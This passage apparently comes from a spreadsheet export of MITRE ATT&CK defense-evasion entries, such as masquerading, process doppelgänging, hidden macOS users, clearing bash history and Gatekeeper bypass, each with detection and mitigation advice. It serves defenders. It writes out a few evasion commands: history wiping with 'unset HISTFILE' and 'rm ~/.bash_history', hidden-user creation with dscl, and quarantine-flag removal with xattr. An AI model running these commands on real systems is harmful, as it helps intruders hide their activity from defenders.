    <t>[[Group/G0032|Lazarus Group]] malware uses multiple types of encryption and encoding in its malware files, including AES, Caracachs, RC4, basic XOR with constant 0xA7, and other techniques.[[CiteRef::Novetta Blockbuster]][[CiteRef::Novetta Blockbuster Loaders]][[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>A [[Group/G0040|Patchwork]] payload was packed with UPX.[[CiteRef::Securelist Dropping Elephant]]</t>
  </si>
  <si>
    <t>Rootkits are programs that hide the existence of malware by intercepting (i.e., [[Technique/T1179|Hooking]]) and modifying operating system API calls that supply system information.[[CiteRef::Symantec Windows Rootkits]] Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [[Technique/T1062|Hypervisor]], Master Boot Record, or the [[Technique/T1019|System Firmware]].[[CiteRef::Wikipedia Rootkit]]
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems.[[CiteRef::CrowdStrike Linux Rootkit]][[CiteRef::BlackHat Mac OSX Rootkit]]</t>
  </si>
  <si>
    <t>Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.</t>
  </si>
  <si>
    <t>File System Logical Offsets</t>
  </si>
  <si>
    <t>Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools.[[CiteRef::Hakobyan 2009]]
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.[[CiteRef::Github PowerSploit Ninjacopy]]</t>
  </si>
  <si>
    <t>File monitoring,File system access controls</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives.[[CiteRef::Github PowerSploit Ninjacopy]]
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [[Technique/T1086|PowerShell]], additional logging of PowerShell scripts is recommended. ,</t>
  </si>
  <si>
    <t>Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1006</t>
  </si>
  <si>
    <t>Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available,[[CiteRef::Wikipedia Exe Compression]] but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.  Several different variations of this technique have been observed.
One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program.  Alternatively, the filename given may be a close approximation of legitimate programs.  This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
===Windows===
In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe.[[CiteRef::Endgame Masquerade Ball]] An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths.[[CiteRef::F-Secure CozyDuke]]
An example of abuse of trusted locations in Windows would be the &lt;code&gt;C:\Windows\System32&lt;/code&gt; directory.  Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".
===Linux===
Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. [[CiteRef::Remaiten]]
An example of abuse of trusted locations in Linux  would be the &lt;code&gt;/bin&lt;/code&gt; directory.  Examples of trusted binary names that can be given to malicious binares include "rsyncd" and "dbus-inotifier".  [[CiteRef::Fysbis Palo Alto Analysis]] [[CiteRef::Fysbis Dr Web Analysis]]</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Whitelisting by file name or path</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
If file names are mismatched between the binary name on disk and the binary's resource section, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries could provide useful leads, but may not always be indicative of malicious activity.[[CiteRef::Endgame Masquerade Ball]] ,</t>
  </si>
  <si>
    <t>When creating security rules, avoid exclusions based on file name or file path. Require signed binaries. Use file system access controls to protect folders such as C:\Windows\System32. Use tools that restrict program execution via whitelisting by attributes other than file name.
Identify potentially malicious software that may look like a legitimate program based on name and location, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>ENDGAME,Bartosz Jerzman</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1036</t>
  </si>
  <si>
    <t>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system. This is common behavior that can be used across different platforms to evade defenses. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.[[CiteRef::Linux/Cdorked.A We Live Security Analysis]]</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] downloads encoded payloads and decodes them on the victim.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>File monitoring,Process Monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</t>
  </si>
  <si>
    <t>Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [[Software/S0160|certutil]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to deobfuscate or decode files or information,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1140</t>
  </si>
  <si>
    <t>[[Software/S0160|certutil]] has been used to decode binaries hidden inside certificate files as Base64 information.[[CiteRef::Malwarebytes Targeted Attack against Saudi Arabia]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used [[Software/S0160|certutil]] to decode base64-encoded files on victims.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>Software: Starloader</t>
  </si>
  <si>
    <t>decrypts and executes shellcode from a file called Stars.jps.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0189|ISMInjector]] uses the &lt;code&gt;certutil&lt;/code&gt; command to decode a payload file.[[CiteRef::OilRig New Delivery Oct 2017]]</t>
  </si>
  <si>
    <t>A [[Group/G0049|OilRig]] macro has run a PowerShell command to decode file contents.[[CiteRef::OilRig New Delivery Oct 2017]]</t>
  </si>
  <si>
    <t>Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [[Software/S0106|cmd]] functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools.[[CiteRef::Trend Micro APT Attack Tools]]</t>
  </si>
  <si>
    <t>Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [[Technique/T1036|Masquerading]] to hide malware and tools.[[CiteRef::WindowsIR Anti-Forensic Techniques]]</t>
  </si>
  <si>
    <t>NTFS Extended Attributes</t>
  </si>
  <si>
    <t>Data or executables may be stored in New Technology File System (NTFS) partition metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.[[CiteRef::Journey into IR ZeroAccess NTFS EA]]
The NTFS format has a feature called Extended Attributes (EA), which allows data to be stored as an attribute of a file or folder.[[CiteRef::Microsoft File Streams]]</t>
  </si>
  <si>
    <t>File monitoring,Kernel drivers</t>
  </si>
  <si>
    <t>Signature-based detection,Anti-virus,Host forensic analysis</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in EA.[[CiteRef::Journey into IR ZeroAccess NTFS EA]] It may be possible to monitor NTFS for writes or reads to NTFS EA or to regularly scan for the presence of modified information. ,</t>
  </si>
  <si>
    <t>It may be difficult or inadvisable to block access to EA. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to hide information in EA by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>NTFS partitioned hard drive</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1096</t>
  </si>
  <si>
    <t>[[Software/S0022|Uroburos]] uses a custom packer.[[CiteRef::Symantec Waterbug]]</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.[[CiteRef::Wikipedia Code Signing]] However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries[[CiteRef::Janicab]]. The certificates used during an operation may be created, forged, or stolen by the adversary.[[CiteRef::Securelist Digital Certificates]][[CiteRef::Symantec Digital Certificates]]
Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform.[[CiteRef::Wikipedia Code Signing]]
Code signing certificates may be used to bypass security policies that require signed code to execute on a system.</t>
  </si>
  <si>
    <t>Windows User Account Control</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. ,</t>
  </si>
  <si>
    <t>Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system.[[CiteRef::NSA MS AppLocker]][[CiteRef::TechNet Trusted Publishers]][[CiteRef::Securelist Digital Certificates]]</t>
  </si>
  <si>
    <t>Windows,macOS</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1116</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in [[Persistence]] and [[Execution]].
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [[Software/S0075|Reg]] may be used for local or remote Registry modification.[[CiteRef::Microsoft Reg]] Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).
The Registry of a remote system may be modified to aid in execution of files as part of [[Lateral Movement]]. It requires the remote Registry service to be running on the target system.[[CiteRef::Microsoft Remote]] Often [[Technique/T1078|Valid Accounts]] are required, along with access to the remote system's [[Technique/T1077|Windows Admin Shares]] for RPC communication.</t>
  </si>
  <si>
    <t>Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.</t>
  </si>
  <si>
    <t>If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [[Technique/T1045|Software Packing]] or otherwise modify the file so it has a different signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>An adversary may attempt to block indicators or events from leaving the host machine. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process or creating a host-based firewall rule to block traffic to a specific server.</t>
  </si>
  <si>
    <t>Sensor health and status,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.
Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1054</t>
  </si>
  <si>
    <t>Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [[Technique/T1055|Process Injection]], execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis.[[CiteRef::Leitch Hollowing]][[CiteRef::Engame Process Injection July 2017]]</t>
  </si>
  <si>
    <t>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.</t>
  </si>
  <si>
    <t>Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests[[CiteRef::MSDN Manifests]] are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.[[CiteRef::Stewart 2014]]
Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has encrypted and encoded data in its malware.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service.[[CiteRef::Cylance Dust Storm]][[CiteRef::Microsoft DTC]]</t>
  </si>
  <si>
    <t>[[Software/S0083|Misdat]] saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service.[[CiteRef::Cylance Dust Storm]][[CiteRef::Microsoft DTC]]</t>
  </si>
  <si>
    <t>New services created by [[Software/S0169|RawPOS]] are made to appear like legitimate Windows services, with names such as "Windows Management Help Service", "Microsoft Support", and "Windows Advanced Task Manager".[[CiteRef::TrendMicro RawPOS April 2015]][[CiteRef::Mandiant FIN5 GrrCON Oct 2016]][[CiteRef::Kroll RawPOS Jan 2017]]</t>
  </si>
  <si>
    <t>In one instance, [[Group/G0045|menuPass]] added [[Software/S0013|PlugX]] as a service with a display name of "Corel Writing Tools Utility."[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] may save itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service.[[CiteRef::Cylance Dust Storm]][[CiteRef::Microsoft DTC]]</t>
  </si>
  <si>
    <t>[[Software/S0086|ZLib]] mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>To establish persistence, [[Software/S0058|SslMM]] identifies the Start Menu Startup directory and drops a link to its own executable disguised as an ?Office Start,? ?Yahoo Talk,? ?MSN Gaming Z0ne,? or ?MSN Talk? shortcut.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] installed its payload in the startup programs folder as "Baidu Software Update." The group also adds its second stage payload to the startup programs as ?Net Monitor."[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Group/G0046|FIN7]] has created a scheduled task named ?AdobeFlashSync? to establish persistence.[[CiteRef::Morphisec FIN7 June 2017]]</t>
  </si>
  <si>
    <t>If installing itself as a service fails, [[Software/S0081|Elise]] instead writes itself as a file named svchost.exe saved in %APPDATA%\Microsoft\Network.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]]'s installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.[[CiteRef::ZScaler Hacking Team]]</t>
  </si>
  <si>
    <t>[[Software/S0138|OLDBAIT]] installs itself in &lt;code&gt;%ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe&lt;/code&gt;; the directory name is missing a space and the file name is missing the letter "o."[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] mimics a legitimate Russian program called USB Disk Security.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>Process Doppelg?nging</t>
  </si>
  <si>
    <t>Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations.[[CiteRef::Microsoft TxF]] To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened.[[CiteRef::Microsoft Basic TxF Concepts]] To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.[[CiteRef::Microsoft Where to use TxF]]
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10.[[CiteRef::BlackHat Process Doppelg?nging Dec 2017]]
Adversaries may leverage TxF to a perform a file-less variation of [[Technique/T1055|Process Injection]] called Process Doppelg?nging. Similar to [[Technique/T1093|Process Hollowing]], Process Doppelg?nging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelg?nging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext.[[CiteRef::BlackHat Process Doppelg?nging Dec 2017]]
Process Doppelg?nging is implemented in 4 steps[[CiteRef::BlackHat Process Doppelg?nging Dec 2017]]:
* Transact ? Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load ? Create a shared section of memory and load the malicious executable.
* Rollback ? Undo changes to original executable, effectively removing malicious code from the file system.
* Animate ? Create a process from the tainted section of memory and initiate execution.</t>
  </si>
  <si>
    <t>API monitoring,Process Monitoring</t>
  </si>
  <si>
    <t>Monitor and analyze calls to CreateTranscation, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg?nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory.[[CiteRef::BlackHat Process Doppelg?nging Dec 2017]][[CiteRef::hasherezade Process Doppelg?nging Dec 2017]]
Scan file objects reported during the PsSetCreateProcessNotifyRoutine,[[CiteRef::Microsoft PsSetCreateProcessNotifyRoutine routine]] which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access.[[CiteRef::BlackHat Process Doppelg?nging Dec 2017]] Also consider comparing file objects loaded in memory to the corresponding file on disk.[[CiteRef::hasherezade Process Doppelg?nging Dec 2017]]
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ,</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.
Although Process Doppelg?nging may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1186</t>
  </si>
  <si>
    <t>[[Group/G0018|admin@338]] actors used the following command to rename one of their tools to a benign file name: &lt;code&gt;ren "%temp%\upload" audiodg.exe&lt;/code&gt;[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by [[Group/G0006|APT1]] as a name for malware.[[CiteRef::Mandiant APT1 Appendix]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0008|Carbanak]] malware names itself "svchost.exe," which is the name of the Windows shared service host program.[[CiteRef::Kaspersky Carbanak]]</t>
  </si>
  <si>
    <t>Accounts created by [[Group/G0035|Dragonfly]] masqueraded as legitimate service accounts.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>The [[Software/S0046|CozyCar]] dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has used hidden or non-printing characters to help masquerade file names on a system, such as appending a Unicode no-break space character to a legitimate service name.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0033|Poseidon Group]] tools attempt to spoof anti-virus processes as a means of self-defense.[[CiteRef::Kaspersky Poseidon Group]]</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>The configurations for how applications run on macOS and OS X are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window [[CiteRef::Antiquated Mac Malware]].</t>
  </si>
  <si>
    <t>Plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them. ,</t>
  </si>
  <si>
    <t>Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1143</t>
  </si>
  <si>
    <t>Adversaries may use [[Technique/T1027|Obfuscated Files or Information]] to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [[Technique/T1064|Scripting]], [[Technique/T1086|PowerShell]], or by using utilities present on the system.
One such example is use of [[Software/S0160|certutil]] to decode a remote access tool portable executable file that has been hidden inside a certificate file.[[CiteRef::Malwarebytes Targeted Attack against Saudi Arabia]]</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.[[CiteRef::Wikipedia Root Certificate]] Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.[[CiteRef::Operation Emmental]]
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications.[[CiteRef::Kaspersky Superfish]]</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Digital Certificate Logs</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present.
Installed root certificates are located in the Registry: &lt;code&gt;HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates&lt;/code&gt;. There is a subset of root certificates that are consistent across Windows systems and can be used for comparison:[[CiteRef::Tripwire AppUNBlocker]]
*18F7C1FCC3090203FD5BAA2F861A754976C8DD25
*245C97DF7514E7CF2DF8BE72AE957B9E04741E85
*3B1EFD3A66EA28B16697394703A72CA340A05BD5
*7F88CD7223F3C813818C994614A89C99FA3B5247
*8F43288AD272F3103B6FB1428485EA3014C0BCFE
*A43489159A520F0D93D032CCAF37E7FE20A8B419
*BE36A4562FB2EE05DBB3D32323ADF445084ED656
*CDD4EEAE6000AC7F40C3802C171E30148030C072 ,</t>
  </si>
  <si>
    <t>HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate.[[CiteRef::Wikipedia HPKP]]</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach,Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1130</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; called &lt;code&gt;Hide500Users&lt;/code&gt; that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [[Technique/T1136|Create Account]] technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt;[[CiteRef::Cybereason OSX Pirrit]].</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs. ,</t>
  </si>
  <si>
    <t>If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; &lt;code&gt;Hide500Users&lt;/code&gt; value will force all users to be visible.</t>
  </si>
  <si>
    <t>Administrator,root</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1147</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as &lt;code&gt;unset HISTFILE&lt;/code&gt;, &lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;, &lt;code&gt;history -c&lt;/code&gt;, &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Log analysis,Host forensic analysis</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file are indicators of suspicious activity. ,</t>
  </si>
  <si>
    <t>Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their &lt;code&gt;~/.bash_history&lt;/code&gt; files. Additionally, making these environment variables readonly can make sure that the history is preserved [[CiteRef:: Securing bash history]].</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1146</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called &lt;code&gt;com.apple.quarantine&lt;/code&gt;. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. 
Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won?t set this flag. Additionally, other utilities or events like drive-by downloads don?t necessarily set it either. This completely bypasses the built-in Gatekeeper check.[[CiteRef::Methods of Mac Malware Persistence]] The presence of the quarantine flag can be checked by the xattr command &lt;code&gt;xattr /path/to/MyApp.app&lt;/code&gt; for &lt;code&gt;com.apple.quarantine&lt;/code&gt;. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, &lt;code&gt;sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app&lt;/code&gt;.[[CiteRef::Clearing quarantine attribute]][[CiteRef::OceanLotus for OS X]]
